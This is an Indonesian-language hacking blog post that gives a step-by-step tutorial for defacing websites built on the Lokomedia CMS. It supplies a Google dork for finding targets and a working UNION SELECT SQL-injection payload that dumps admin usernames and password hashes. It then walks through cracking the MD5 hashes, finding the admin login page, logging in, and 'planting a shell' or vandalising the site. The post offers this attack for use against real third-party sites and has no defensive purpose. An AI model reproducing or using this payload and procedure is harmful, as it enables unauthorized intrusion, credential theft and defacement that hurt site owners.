Deface SQL Lokomedia Fresh Dork


Hy apa kabar sob :) kali ini saya akan share tutorial deface teknik lama sih tapi masih work kok tergantung otak vokep kalian :v






Sesuai judul diatas gw mau share deface SQL Lokomedia :)

langsung aja yuk :)

Bahan :


  NB: kembangin lg dork nya :)

- Exploit :
   
   'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

- MD5 Decrypter
  

Tutorialnya :

1. Dorking di google, nah sekarang gw pake dork inurl:/statis-1-profil.html site:org
   gw udah punya target nihh








2. Klik targetnya terus masukan Exploitya dibelakang angka ya misal http://site.co.li/statis-2-profil
    kalo sudah di kasih expolit jadi kayak gini
 Http://site.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

liat gambar ya :)







    
3. Kalo vuln maka akan terlihat nama admin dan paswordnya dengan cara tekan ctrl+u pada keyboard
Gk semua site vuln coeg deface butuh kesabaran semua tidak ada yg instan !







4. Tinggal kita hash dahh password tersebut, gw has disini 
    https://hashkiller.co.uk/md5-decrypter.aspx





ketemu kan paswordnya :v




5. Tinggal kita cari admin login site nya 
    site.coli/admin
    site.coli/adminweb
    site.coli/redaktur

     atau lu bisa pake Tool Admin Finder udah gw upload di blog ini tinggal lu download yak :v 
   Sekarang gw udah ketemu admin loginya nih






6. Coba gw login ya :)





  Masuk kan  hahah Terserah lu dahh mau lu apain tuhh web tanem shell kek acak-acak kek coli juga bisa :v 
pesan gw kalo mau tebas index backup dulu indexnya kasian ini site indo hargai webmaster, emang jadi webmaster mudah coeg !


Ok sekian dari gw semoga bermanfaat :)


salam saya Gord1


Our Struggle Team


    

Post a Comment

[blogger]

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget